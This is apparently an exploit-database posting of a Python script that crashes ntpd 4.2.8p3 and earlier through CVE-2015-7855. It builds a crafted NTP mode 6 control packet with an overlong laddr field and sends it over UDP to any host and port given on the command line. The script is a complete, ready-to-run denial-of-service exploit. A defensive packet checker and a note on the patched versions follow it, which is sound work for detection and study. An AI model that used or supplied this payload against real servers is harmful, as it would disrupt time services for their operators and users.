
NTP 4.2.8p3 Denial Of Service Exploit


```python
#!/usr/bin/env python
# Exploit Title: ntpd 4.2.8p3 remote DoS
# Date: 2015-10-21
# Bug Discovery: John D "Doug" Birdwell
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: http://support.ntp.org/bin/view/Main/NtpBug2922
# Vendor Homepage: http://www.ntp.org/
# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz
# Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77
# CVE: CVE-2015-7855

import sys
import socket

if len(sys.argv) != 3:
    print "usage: " + sys.argv[0] + " <host> <port>"
    sys.exit(-1)

payload = (
    # 12-byte NTP mode 6 (control) header: version 2, mode 6, opcode 0x0a,
    # sequence 2, count 0x00a0 (160 data bytes follow)
    "\x16\x0a\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa0"
    # ASCII data: "nonce=da3d5d0ff8081ec8352a2286, frags=32, laddr="
    "\x6e\x6f\x6e\x63\x65\x3d\x64\x61\x33\x64\x35\x64\x30\x66\x66\x38"
    "\x30\x38\x31\x65\x63\x38\x33\x35\x32\x61\x32\x32\x38\x36\x2c\x20"
    "\x66\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d"
    # laddr value: a run of 0x39 ("9") filling the rest of the data field
    "\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"
    "\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"
    "\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"
    "\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"
    "\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"
    "\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"
    "\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"
)

print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))
print "[+] Done!"
```
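A defender-side check for the request shape used by the script above, as an added example that is not part of the original posting: it parses the 12-byte NTP mode 6 header of a captured UDP payload and flags requests whose `laddr` value is too long to be an address. The function names, the 64-byte threshold and the sample packets are assumptions constructed for illustration.

```python
import struct

# NTP mode 6 (control) header, RFC 1305 Appendix B: LI/VN/mode, R/E/M/opcode,
# sequence, status, association ID, offset, count (12 bytes), then `count` data bytes.
CTL_HEADER = struct.Struct("!BBHHHHH")
MODE_CONTROL = 6
MAX_ADDR_TEXT = 64  # assumed ceiling: longer than any textual IPv4/IPv6 address with port


def inspect_mode6(datagram, max_addr_text=MAX_ADDR_TEXT):
    """Return a list of findings for one UDP payload sent to an NTP server."""
    if len(datagram) < CTL_HEADER.size:
        return []
    flags, op, _seq, _status, _assoc, _offset, count = CTL_HEADER.unpack_from(datagram)
    if flags & 0x07 != MODE_CONTROL or op & 0x80:  # not mode 6, or a response
        return []
    findings = []
    data = datagram[CTL_HEADER.size:]
    if count > len(data):
        findings.append("count field %d exceeds %d data bytes present" % (count, len(data)))
    # The data field is a comma-separated list of name=value items.
    for item in data[:count].split(b","):
        key, _, value = item.strip().partition(b"=")
        if key.lower() == b"laddr" and len(value) > max_addr_text:
            findings.append("opcode %d: laddr value is %d bytes" % (op & 0x1F, len(value)))
    return findings


def make_request(opcode, data):
    """Build a constructed mode 6 request (version 2) for the samples below."""
    return CTL_HEADER.pack(0x16, opcode, 2, 0, 0, 0, len(data)) + data


# Constructed samples (not captured traffic).
SUSPECT = make_request(10, b"nonce=0123456789abcdef01234567, frags=32, laddr=" + b"9" * 112)
BENIGN = make_request(10, b"nonce=0123456789abcdef01234567, frags=32, laddr=192.0.2.10")
CLIENT = b"\x23" + b"\x00" * 47  # ordinary mode 3 time request

if __name__ == "__main__":
    for name, pkt in (("suspect", SUSPECT), ("benign", BENIGN), ("client", CLIENT)):
        print(name, inspect_mode6(pkt))
```

Per the version line in the script header, 4.2.8p4 and 4.3.77 are the first releases outside the affected range.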
